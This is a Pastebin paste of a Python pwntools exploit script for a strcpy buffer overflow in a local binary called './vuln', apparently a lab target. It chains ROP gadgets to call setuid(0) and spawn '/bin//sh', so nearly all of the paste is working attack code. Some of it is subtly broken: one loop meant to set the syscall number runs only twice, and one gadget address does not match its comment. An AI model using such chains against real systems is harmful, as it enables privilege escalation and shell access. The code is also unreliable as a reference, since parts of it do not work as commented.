API tools faq
paste
Advertisement
Guest User

exploit code strcpy

a guest
Jun 18th, 2019
954
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.08 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. from pwn import *
  3. #from subprocess import call
  4.  
  5. def main():
  6.     # 1094205761 found at offset: 112
  7.     offset = 112
  8.  
  9.     # 0x08049453 : xor eax, eax ; ret
  10.     xor_eax = p32(0x08049453)  
  11.    
  12.     # 0x0807a65f : inc eax ; ret
  13.     inc_eax = p32(0x0807a65f)
  14.  
  15.     # 0x080d5e5d : inc ebx ; ret
  16.     inc_ebx = p32(0x080d5e5d)
  17.  
  18.     # 0x080d5b4f : inc ecx ; ret
  19.     inc_ecx = p32(0x080d5b4f)
  20.  
  21.     # 0x0805cd67 : inc edx ; ret
  22.     inc_edx = p32(0x0805cd67)
  23.  
  24.     # 0x0806f27c : nop ; nop ; nop ; int 0x80
  25.     int_80 = p32(0x0806f27c + 4)
  26.  
  27.     # 0x080546ab : mov dword ptr [edx], eax ; ret
  28.     mov_to_addr_edx_from_eax = p32(0x080546ab)
  29.    
  30.     # 0x0806ec7a : pop edx ; ret
  31.     pop_edx = p32(0x0806ec7a)
  32.    
  33.     # 0x080b7fc6 : pop eax ; ret
  34.     pop_eax = p32(0x080b7fc6)
  35.  
  36.     # 0x080de6b1 : pop ecx ; ret
  37.     pop_ecx = p32(0x080de6b1)
  38.    
  39.     # 0x080481c9 : pop ebx ; ret
  40.     pop_ebx = p32(0x080481c9)
  41.  
  42.     # 0x080481b2 : ret
  43.     ret = p32(0x080481c9)
  44.  
  45.     # 080ea060 l    d  .data  00000000 .data
  46.     bin_addr = p32(0x080ea060)
  47.     sh_addr = p32(0x080ea060 + 4)
  48.     bin_sh = bin_addr # Refers to the whole '/bin//sh' string
  49.    
  50.     # execve(const char *pathname, char *const argv[], char *const envp[]) 
  51.     #   eax     ebx         ecx             edx             esi
  52.     #   0x0b    char __user *   char __user *__user *   char __user *__user *   struct pt_regs *
  53.  
  54.     # Writes bin to bin_addr
  55.     rop_shell = ""
  56.     rop_shell += pop_edx # Pops the next value(bin_addr) to the edx register
  57.     rop_shell += bin_addr # bin_addr to be stored in the edx register
  58.     rop_shell += pop_eax # Pops the next value, "/bin" to the eax register
  59.     rop_shell += "/bin" # "/bin" to be stored in the eax register
  60.     rop_shell += mov_to_addr_edx_from_eax # Moves the "/bin" string to the address in edx register
  61.  
  62.     # Writes sh to sh_addr
  63.     rop_shell += pop_edx # Pops the next value(sh_addr) to the edx register
  64.     rop_shell += sh_addr # sh_addr to be stored in the edx register
  65.     rop_shell += pop_eax # Pops the next value, "//sh" to the eax register 
  66.     rop_shell += "//sh" # "//sh" to be stored in the eax register
  67.     rop_shell += mov_to_addr_edx_from_eax # Moves the "//sh" string to the addres in edx register  
  68.  
  69.     # Sets eax to 0x0b
  70.     # 0xb = 11
  71.     rop_shell += xor_eax # Zero-ing eax register
  72.  
  73.     for i in range(1, 12): # Increments eax until its value is 0xb(11) is reached
  74.         rop_shell += inc_eax # Increments eax register by 1
  75.  
  76.     # Stores the address of "/bin//sh" in ebx
  77.     rop_shell += pop_ebx # Pops the next value(bin_sh) to the ebx register
  78.     rop_shell += bin_sh # bin_sh to be stored in the ebx register  
  79.  
  80.     # Sets ecx to 0
  81.     rop_shell += pop_ecx # Pops the next value(0xffffffff) to the ecx register
  82.     rop_shell += p32(0xffffffff) # We can't directly store null value since strcpy will fail
  83.     rop_shell += inc_ecx # 0xffffffff + 0x1 = 0x00000000
  84.  
  85.     # Sets edx to 0
  86.     rop_shell += pop_edx # Pops the next value(0xffffffff) to the edx register
  87.     rop_shell += p32(0xffffffff) # We can't directly store null value since strcpy will fail
  88.     rop_shell += inc_edx # 0xffffffff + 0x1 = 0x00000000
  89.  
  90.     # Do a syscall execve("/bin/sh", 0, 0) 
  91.     # Eax : 0xb , Ebx: "/bin/sh", Ecx: 0, Edx: 0
  92.     rop_shell += int_80
  93.  
  94.     #   eax     ebx
  95.     #   0x17    old_uid_t uid  
  96.    
  97.     # Sets eax to 0x17(23)
  98.     rop_setuid = ""
  99.     rop_setuid += xor_eax # Zero-ing the eax register
  100.  
  101.     for i in (1, 24): # Increments eax register from 0 till its value is 0x17(23) is reached
  102.         rop_setuid += inc_eax # Increments eax register by 1
  103.  
  104.     # Sets ebx to 0
  105.     rop_setuid += pop_ebx # Pops the next value(0xffffffff) to the ebx register
  106.     rop_setuid += p32(0xffffffff) # We can't directly store null value since strcpy will fail
  107.     rop_setuid += inc_ebx # 0xffffffff + 0x1 = 0x00000000  
  108.    
  109.     # Do a syscall setuid(0)
  110.     # Eax: 0x17 , Ebx: 0
  111.     rop_setuid += int_80
  112.  
  113.     # Joins the initial payload with ROP's
  114.     payload = "A" * offset # Padding buffer with junk till offset
  115.     payload += rop_setuid
  116.     payload += rop_shell
  117.     print payload # Display payload in console
  118.  
  119.     # Writes payload to file for debugging purposes
  120.     fname = 'test'
  121.     with open(fname, 'w') as f:
  122.         f.write(payload)
  123.  
  124.     # Executes exploit via call : unstable
  125.     # Workaround: ./vuln $(cat test)
  126.     # call(["./vuln", payload])
  127.  
  128. if __name__ == "__main__":
  129.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!